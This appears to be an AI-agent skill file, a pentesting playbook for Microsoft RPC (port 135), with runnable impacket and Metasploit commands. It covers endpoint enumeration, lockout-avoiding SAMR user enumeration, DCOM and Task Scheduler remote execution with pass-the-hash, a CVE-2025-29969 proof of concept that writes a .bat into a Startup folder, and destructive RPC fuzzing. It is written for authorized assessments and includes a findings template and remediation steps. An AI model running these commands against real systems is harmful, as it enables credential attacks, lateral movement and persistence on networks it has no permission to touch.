pentesting-msrpc

$ npx mdskill add xalgord/xalgorix/pentesting-msrpc

SKILL.md (.github/skills/pentesting-msrpc)
---
name: pentesting-msrpc
description: Testing the Microsoft RPC (MSRPC / DCE-RPC) endpoint mapper and exposed RPC interfaces during authorized engagements. The endpoint mapper listens on TCP/UDP 135 (also reachable over SMB named pipes on 139/445 and HTTP on 593). Covers endpoint enumeration with rpcdump, IFID-to-named-pipe mapping (lsarpc, samr, svcctl, atsvc), DCOM command execution, IOXIDResolver interface discovery, and RPC interface fuzzing.
domain: cybersecurity
subdomain: network-services-pentesting
tags:
  - penetration-testing
  - network-services
  - msrpc
  - dcerpc
  - windows
  - lateral-movement
version: '1.0'
author: xalgorix
license: Apache-2.0
---

# Pentesting MSRPC (port 135)

## When to Use

- During authorized Windows/AD assessments when TCP 135 (or 593, or RPC over SMB on 139/445) is open
- When mapping which RPC services and named pipes a host exposes (LSA, SAMR, Task Scheduler, Service Control)
- When you have valid credentials and want remote code execution via DCOM (dcomexec)
- When enumerating network interfaces/IPv6 addresses without authentication via IOXIDResolver
- When researching RPC interface attack surface (fuzzing) on an isolated test host

## Quick Enumeration

```bash
# Dump RPC endpoints registered with the endpoint mapper (135)
rpcdump.py <IP> -p 135
rpcdump.py -port 135 [[domain/]username[:password]@]<IP>

# Map endpoints reachable over SMB named pipes / other transports
rpcdump.py -port 139 [[domain/]username[:password]@]<IP>
rpcdump.py -port 445 [[domain/]username[:password]@]<IP>

# Metasploit DCERPC scanners (all target port 135 except tcp_dcerpc_auditor)
msf> use auxiliary/scanner/dcerpc/endpoint_mapper
msf> use auxiliary/scanner/dcerpc/hidden
msf> use auxiliary/scanner/dcerpc/management
msf> use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
```

## Critical: Checks Most Often Missed

1. **Endpoint mapper exposes the dynamic port range** — `rpcdump.py` reveals IFID values, the named pipe, and the binding (`ncacn_ip_tcp`, `ncadg_ip_udp`, `ncacn_np`, `ncacn_http`). Each IFID maps to a high-value service.
2. **Named-pipe interfaces of interest:**
   - `\pipe\lsarpc` (LSA) — enumerate users
   - `\pipe\samr` (SAMR) — read SAM elements and brute-force users **regardless of account lockout policy**
   - `\pipe\atsvc` (Task Scheduler) — remote command execution (atexec)
   - `\pipe\svcctl` / `\pipe\srvsvc` (Service Control) — remote start/stop services + command execution
   - `\pipe\winreg` (Remote Registry) — read/modify the registry
   - `\pipe\epmapper` (DCOM) — info gathering and password grinding
3. **IOXIDResolver unauthenticated enumeration** — the `ServerAlive2` method in the IOXIDResolver interface leaks all network interfaces (including IPv6) with no auth.
4. **DCOM RCE with valid creds** — `dcomexec.py` executes commands via DCOM objects (ShellWindows, ShellBrowserWindow, MMC20).
5. **MS-EVEN / CVE-2025-29969 (EventLog-in)** — a TOCTOU flaw in the MS-EVEN interface (`\pipe\even`) lets an authenticated low-privileged user trigger a remote arbitrary file write; it also exposes a file-existence probe primitive.

How to CONFIRM: MSRPC is confirmed when `rpcdump.py <IP> -p 135` returns one or more IFID entries with bindings. The presence of `\pipe\samr` confirms SAMR-based user enumeration is possible; `\pipe\svcctl`/`\pipe\atsvc` confirm remote-exec primitives (with creds).
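A triage helper, added here as an example and not part of this skill or of impacket: it parses DCE-RPC stringbindings of the form `<protseq>:<address>[<endpoint>]`, maps the IFID UUIDs that `rpcdump.py` returns to the named pipes listed above, and renders the "Exposed Interfaces" table from the Output Format section below. The input is a constructed sample in the layout of Step 1's sample-output comments (not real rpcdump output), and `10.0.0.5` is a placeholder address; the atsvc UUID is the standard Microsoft one for that interface.

```python
import re
# IFID -> (named pipe, description, risk). The samr and svcctl UUIDs are the two the
# page's Output Format quotes; atsvc is the standard Microsoft UUID for that pipe.
KNOWN_IFIDS = {
    "12345778-1234-abcd-ef00-0123456789ac": (r"\pipe\samr", "SAMR user enum", "Lockout-safe grinding"),
    "367abb81-9844-35f1-ad32-98f038001003": (r"\pipe\svcctl", "Service control", "Remote exec (creds)"),
    "1ff70682-0a51-30e8-076d-740be8cee98b": (r"\pipe\atsvc", "Task Scheduler", "Remote exec (creds)"),
}

# DCE-RPC stringbinding grammar: <protocol sequence>:<network address>[<endpoint>]
BINDING_RE = re.compile(
    r"^(?P<protseq>ncacn_np|ncacn_ip_tcp|ncadg_ip_udp|ncacn_http):(?P<addr>[^\[]*)\[(?P<endpoint>[^\]]+)\]$")

def parse_binding(binding):
    """Split a stringbinding into protseq/addr/endpoint; reject anything malformed."""
    m = BINDING_RE.match(binding.strip())
    if m is None:
        raise ValueError(f"not a stringbinding: {binding!r}")
    return m.groupdict()

def triage(rpcdump_text):
    """Pair each 'IFID: <uuid> version <v>' line with its 'Binding:' line; unknown IFIDs are kept."""
    rows, ifid = [], None
    for line in rpcdump_text.splitlines():
        line = line.strip()
        if line.startswith("IFID:"):
            ifid = line.split()[1].lower()
        elif line.startswith("Binding:") and ifid:
            b = parse_binding(line[len("Binding:"):])
            pipe, desc, risk = KNOWN_IFIDS.get(ifid, ("-", "unknown interface", "review manually"))
            rows.append({"ifid": ifid, "pipe": pipe, "desc": desc, "risk": risk,
                         "protseq": b["protseq"], "endpoint": b["endpoint"]})
    return rows

def finding_table(rows):
    """Render the 'Exposed Interfaces' table used by the finding template."""
    out = ["| IFID | Named Pipe | Description | Risk |", "|------|-----------|-------------|------|"]
    out += [f"| {r['ifid']} | {r['pipe']} | {r['desc']} | {r['risk']} |" for r in rows]
    return "\n".join(out)

# Constructed sample laid out like the page's 'Sample output line' comments (placeholder host 10.0.0.5).
SAMPLE = """\
IFID: 12345778-1234-abcd-ef00-0123456789ac version 1.0
Named Pipe: \\pipe\\samr (LSA SAMR interface)
Binding: ncacn_np:10.0.0.5[\\pipe\\samr]
IFID: 367abb81-9844-35f1-ad32-98f038001003 version 2.0
Binding: ncacn_ip_tcp:10.0.0.5[49667]
IFID: deadbeef-0000-0000-0000-000000000000 version 1.0
Binding: ncacn_http:10.0.0.5[593]
"""
```

Run `print(finding_table(triage(SAMPLE)))` to get the table; unknown IFIDs land in it marked "review manually" so nothing the endpoint mapper exposes is silently dropped.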
## Workflow

### Step 1: Enumerate RPC endpoints and interfaces

```bash
# Primary endpoint discovery
rpcdump.py <IP> -p 135
# Sample output line:
#   IFID: 12345778-1234-abcd-ef00-0123456789ac version 1.0
#   Named Pipe: \pipe\samr (LSA SAMR interface)
#   Binding: ncacn_np:<IP>[\pipe\samr]

# Enumerate over alternate transports if 135 is filtered
rpcdump.py -port 445 [[domain/]username[:password]@]<IP>

# Identify exposed RPC services with Metasploit
msf> use auxiliary/scanner/dcerpc/endpoint_mapper
msf> set rhosts <IP>
msf> run
```

### Step 2: Unauthenticated interface abuse (IOXIDResolver)

```bash
# Leak network interfaces (incl. IPv6) via ServerAlive2 — no creds needed
git clone https://github.com/mubix/IOXIDResolver
python3 IOXIDResolver.py -t <IP>

# Alternative: rpcmap.py from impacket with a stringbinding
rpcmap.py 'ncacn_ip_tcp:<IP>'
```

### Step 3: Authenticated enumeration via named pipes

```bash
# SAMR/LSA user enumeration over RPC (account-lockout-safe enumeration)
samrdump.py [[domain/]username[:password]@]<IP>
rpcclient -U "domain/user%pass" <IP> -c 'enumdomusers'

# Remote registry read over \pipe\winreg
reg.py domain.local/USER@<IP> -hashes <LM:NT> query -keyName HKLM -s
```

### Step 4: Command execution / lateral movement

```bash
# DCOM RCE with valid credentials (try each object if one is blocked)
dcomexec.py [[domain/]username[:password]@]<IP>
dcomexec.py -object MMC20 [[domain/]username[:password]@]<IP>
dcomexec.py -hashes <LM:NT> administrator@<IP>   # Pass-the-Hash

# Task Scheduler exec via \pipe\atsvc (port 135/445)
atexec.py [[domain/]username[:password]@]<IP> "whoami"

# CVE-2025-29969 (MS-EVEN) — authorized PoC only, isolated lab
impacket-smbserver -smb2support Share /tmp/safebreach
python write_file_remotely.py <target> <attacker> lowuser Test123 \
    "/tmp/safebreach/Sample.evtx" "calc.bat" \
    "C:\\Users\\lowuser\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\target.bat"
```

### Optional: RPC interface fuzzing (isolated VM only)
```powershell
# NtObjectManager: turn an RPC server DLL into a client stub
Install-Module NtObjectManager -Force
$ifs = Get-RpcServer "C:\Windows\System32\efssvc.dll"
$ifs | Format-Table Name,Uuid,Version,Procedures
Format-RpcClient $ifs[0] -Namespace MS_EFSR -OutputPath .\MS_EFSR.cs

# MS-RPC-Fuzzer (DESTRUCTIVE — expect service crashes/BSOD)
Import-Module .\MS-RPC-Fuzzer.psm1
Get-RpcServerData -OutPath .\output
'.\output\rpcServerData.json' | Invoke-RpcFuzzer -OutPath .\output
```

## Key Concepts

| Concept | Description |
|---------|-------------|
| **MSRPC / DCE-RPC** | Client-server protocol letting a program invoke a procedure on a remote machine |
| **Endpoint mapper** | Service on TCP/UDP 135 that maps interface UUIDs to dynamic ports/pipes |
| **IFID** | Interface identifier (UUID + version) uniquely naming an RPC interface |
| **Binding / stringbinding** | Transport spec, e.g. `ncacn_ip_tcp`, `ncadg_ip_udp`, `ncacn_np`, `ncacn_http` |
| **Named pipe** | SMB-backed transport for RPC (e.g. `\pipe\samr`, `\pipe\svcctl`) |
| **SAMR lockout bypass** | The SAMR interface allows password grinding without triggering account lockout |
| **IOXIDResolver** | DCOM interface whose ServerAlive2 method leaks interfaces unauthenticated |
| **DCOM exec** | Remote code execution via DCOM objects (ShellWindows, MMC20) |

## Tools & Systems

| Tool | Purpose |
|------|---------|
| **impacket rpcdump.py** | Enumerate RPC endpoints/IFIDs across transports |
| **impacket rpcmap.py** | Query interfaces by stringbinding |
| **impacket dcomexec.py / atexec.py** | DCOM and Task Scheduler remote command execution |
| **impacket samrdump.py / reg.py** | SAMR user dump and remote registry access |
| **Metasploit dcerpc scanners** | endpoint_mapper, hidden, management, tcp_dcerpc_auditor |
| **IOXIDResolver** | Unauthenticated network interface enumeration |
| **NtObjectManager / MS-RPC-Fuzzer** | RPC client-stub generation and interface fuzzing |

## Common Scenarios

### Scenario 1: Endpoint Mapping

`rpcdump.py <IP> -p 135` lists `\pipe\samr`, `\pipe\svcctl`, and `\pipe\atsvc`, confirming the host exposes user-enumeration and remote-exec interfaces for later credentialed abuse.

### Scenario 2: IPv6 Disclosure

On a dual-stack host, IOXIDResolver's ServerAlive2 leaks an internal IPv6 address unauthenticated, opening an IPv6 path that bypasses IPv4 ACLs.

### Scenario 3: DCOM Lateral Movement

With a captured local admin hash, `dcomexec.py -object MMC20 -hashes :<hash> administrator@<IP>` yields a semi-interactive shell without creating a new service.

### Scenario 4: Account-Lockout-Safe Enumeration

SAMR over `\pipe\samr` enumerates all domain users without incrementing the bad-password counter, providing a clean user list for spraying elsewhere.
## Output Format

```
## MSRPC Finding

**Service**: Microsoft RPC (DCE-RPC)
**Severity**: <Critical|High|Medium|Informational>
**Host**: <IP>:135 (also 139/445/593 as applicable)

### Summary
<What was found: exposed interfaces, IOXIDResolver leak, DCOM RCE, CVE-2025-29969>

### Exposed Interfaces
| IFID | Named Pipe | Description | Risk |
|------|-----------|-------------|------|
| 12345778-1234-abcd-ef00-0123456789ac | \pipe\samr | SAMR user enum | Lockout-safe grinding |
| 367abb81-9844-35f1-ad32-98f038001003 | \pipe\svcctl | Service control | Remote exec (creds) |

### Evidence
- Command: rpcdump.py <IP> -p 135
- Output: <IFID/binding excerpt>

### Recommendation
1. Restrict access to TCP 135 and the dynamic RPC port range at the firewall
2. Limit RPC over SMB named pipes to trusted management hosts
3. Apply patches for known RPC CVEs (e.g. CVE-2025-29969 / MS-EVEN)
4. Enforce strong credentials to limit DCOM/SAMR abuse impact
```